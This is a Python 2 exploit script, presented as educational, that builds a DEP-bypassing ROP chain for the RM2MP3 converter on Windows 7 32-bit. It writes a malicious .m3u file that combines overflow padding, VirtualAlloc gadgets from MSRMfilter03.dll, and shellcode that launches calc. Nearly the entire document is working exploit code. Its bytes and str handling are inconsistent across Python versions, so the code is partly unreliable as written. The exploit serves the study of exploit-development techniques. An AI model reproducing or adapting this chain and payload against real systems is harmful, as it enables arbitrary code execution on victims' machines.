Simple Example of an alternative ROP Exploit for RM2MP3 converter for Windows 7 Ultimate 32bit
from sys import argv
import struct
"""
ROP exploit for the RM converter example from Corelan's blog, written here for educational purposes
Tested on: Windows 7 32bit Ultimate
author: Keith (k3170) Makan
Refs:
http://www.fuzzysecurity.com/tutorials/expDev/7.html
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
Basic PUSHAD strategy
EAX = ptr to &VirtualAlloc()
ECX = flProtect (0x40) DONE
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
"""
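def prepFlProtect():
    """Pack the gadget chain the author uses to leave 0x40 (flProtect) in ECX.

    Per the author's notes this stage clobbers EAX: a seed value is popped
    into EAX, a constant is added to reach the target value, and the result
    is moved into ECX through a PUSH/POP gadget.

    Returns:
        The gadget addresses packed back to back as little-endian 32-bit
        values, ready to be appended to the payload buffer.
    """
    #kills EAX
    #ECX holds 0x40
    rop_gadgets = [
        0x1002b93e,  # POP EAX # RETN
        0xfbdbbc15,  # set eax to something
        0x1002ba24,  # ADD EAX,424442B # RETN
        0x10024e95,  # PUSH EAX # PUSH SS # ADD AL,10 # POP ECX # POP ECX # RETN
        #0x10013f25 # PUSH EAX # RETN
    ]
    # struct.pack returns bytes; joining on a str separator raises TypeError
    # under Python 3, while b'' is the same str object under Python 2.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)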
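def prepflAllocationType():
    """Pack the gadget chain the author uses to set EDX (flAllocationType).

    The author's inline notes describe the route: build the value in EAX,
    move it to ECX, then into EBX, then into EDX via ADD gadgets, with
    filler dwords consumed by the RETN 0x10 gadgets along the way. The
    commented-out PUSH EAX entries are the author's debugging stops; the
    note on them says EDX appeared to pick up the last stack value, so the
    final register state should be confirmed rather than assumed.

    Returns:
        The gadget addresses packed back to back as little-endian 32-bit
        values, ready to be appended to the payload buffer.
    """
    rop_gadgets = [
        0x1002b93e,  # POP EAX # RETN
        0xfbdbcbd7,  # (set eax to something added 2 for 2 0xff's add later on)
        0x1002ba24,  # ADD EAX,424442B # RETN (EAX has 1000 in it)
        0x10024e95,  # PUSH EAX # PUSH SS # ADD AL,10 # POP ECX # POP ECX # RETN (ecx has value)
        0x10024ed0,  # POP EBX # RETN 0x10 (clear EBX value )
        0xffffffff,  # (buff value)
        0x100308bf,  # (buff value)
        0x100308bf,  # (buff value)
        0x100308bf,  # (buff value)
        0x100308bf,  # (buff value)
        0x100308bf,  # (buff value)
        0x100308bf,  # (buff value)
        0x100308bf,  # (buff value)
        0x10028865,  # ADD EBX,ECX # SUB AL,24 # POP EDX # RETN (clear edx, switch ECX and EBX, ebx has value)
        0xffffffff,  # (buff value)
        0x10024ece,  # ADD EDX,EBX # POP EBX # RETN 0x10 (swap EBX, EDX edx has value -1)
        0xffffffff,  # (buff value pop ebx)
        0x100308bf,  # (buff value)
        0x100308bf,  # (buff value)
        0x100308bf,  # (buff value)
        0x100308bf,  # (buff value)
        0x100308bf,  # (buff value)
        0x100308bf,  # (buff value)
        0x100308bf,  # (buff value)
        #0x10013f25 # PUSH EAX # RETN (check if EDX has trigger value, this push breaks execution for inspection) or some reason EDX seems to pick up whatever the last value on the stack was
        #0x10013f25 # PUSH EAX # RETN (check if EDX has trigger value, this push breaks execution for inspection)
    ]
    # struct.pack returns bytes; joining on a str separator raises TypeError
    # under Python 3, while b'' is the same str object under Python 2.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)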
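def prepDwSize():
    """Pack the gadget chain the author uses to leave the dwSize value in EBX.

    As with prepFlProtect, the value is built in EAX (which this stage
    clobbers) and transferred with a PUSH/POP gadget; the two trailing
    filler dwords are consumed by that gadget's ADD ESP,8.

    Returns:
        The gadget addresses packed back to back as little-endian 32-bit
        values, ready to be appended to the payload buffer.
    """
    #kills EAX
    #EBX holds 320 = 800 bytes
    rop_gadgets = [
        0x1002b93e,  # POP EAX # RETN
        0xfbdbbef6,  # (set eax to something added 2 for 2 0xff's add later on)
        0x1002ba24,  # ADD EAX,424442B # RETN (EAX has 1000 in it)
        0x1001bdee,  # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
    ]
    # struct.pack returns bytes; joining on a str separator raises TypeError
    # under Python 3, while b'' is the same str object under Python 2.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)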
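def prepVirtualAllocPTR():
    """Pack the gadget chain the author uses to load the VirtualAlloc IAT pointer.

    The pointer is popped into EAX and, via the PUSH EAX ... POP ESI gadget,
    also ends up in ESI; the module notes describe EAX as the pointer slot
    and ESI as the JMP [EAX] slot of the PUSHAD layout.

    Returns:
        The gadget addresses packed back to back as little-endian 32-bit
        values, ready to be appended to the payload buffer.
    """
    rop_gadgets = [
        0x1002d8d2,  # POP EAX # RETN [MSRMfilter03.dll]
        0x10032078,  # ptr to virtual alloc
        0x1002588C,  # PUSH EAX # ADD DWORD PTR SS:[EBP+5],ESI # PUSH 1 # POP EAX # POP ESI # RETN
    ]
    # struct.pack returns bytes; joining on a str separator raises TypeError
    # under Python 3, while b'' is the same str object under Python 2.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)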
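def prepEDI():
    """Pack the gadget chain that loads EDI with a plain RETN (the ROP NOP).

    Returns:
        The gadget addresses packed back to back as little-endian 32-bit
        values, ready to be appended to the payload buffer.
    """
    rop_gadgets = [
        0x10023e98,  # POP EDI # RETN [MSRMfilter03.dll]
        0x1001c121,  # RETN (ROP NOP) [MSRMfilter03.dll]
        #0x10013f25 # PUSH EAX # RETN (check if EDX has trigger value, this push breaks execution for inspection)
    ]
    # struct.pack returns bytes; joining on a str separator raises TypeError
    # under Python 3, while b'' is the same str object under Python 2.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)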
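def prepEAX():
    """Pack the final stage: pop a NOP dword into EAX, then the PUSHAD gadget.

    This is the last helper the script appends, after the stages that the
    author notes clobber EAX, so EAX still holds this value when PUSHAD
    writes the register file onto the stack.

    Returns:
        The gadget addresses packed back to back as little-endian 32-bit
        values, ready to be appended to the payload buffer.
    """
    rop_gadgets = [
        0x1002b93e,  # POP EAX # RETN
        0x90909090,  # (NOP) [MSRMfilter03.dll]
        0x10010e05,  # PUSHAD
    ]
    # struct.pack returns bytes; joining on a str separator raises TypeError
    # under Python 3, while b'' is the same str object under Python 2.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)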
if __name__ == "__main__":
    # Length of the padding placed before the first gadget address; the
    # value is specific to the build the author tested (see module notes).
    ovTrigger = 26078
    # NOTE(review): opened in text mode and closed by hand below rather than
    # with a with-block; on Windows text mode would rewrite any 0x0A byte.
    f = open("exploit.m3u","w")
    trigger = "A"*(ovTrigger)
    rop = "\x99\x3E\x02\x10" #10023E99 RETN
    # Four filler bytes; their purpose is not stated in the source.
    rop += "A"*4
    # Stage order matters: prepFlProtect and prepDwSize are annotated as
    # clobbering EAX, so the EAX/PUSHAD stage is appended last.
    rop += prepflAllocationType()
    rop += prepFlProtect()
    rop += prepDwSize()
    rop += prepVirtualAllocPTR()
    rop += prepEDI()
    rop += prepEAX()
    # Payload bytes the author labels "calc", credited to the fuzzysecurity
    # tutorial; they are appended after the chain and not modified here.
    shellcode = calc = ( #stole some shellcode and tips from http://www.fuzzysecurity.com/tutorials/expDev/7.html
    "\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
    "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
    "\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
    "\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
    "\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
    "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
    # Python 2 print statement: dumps the chain as \x-separated hex for
    # inspection; the whole script is Python 2 only because of it.
    print '\\x'.join(hex(ord(c))[2:]for c in rop)
    payload = trigger + rop + shellcode
    f.write(payload)
    f.flush()
    f.close()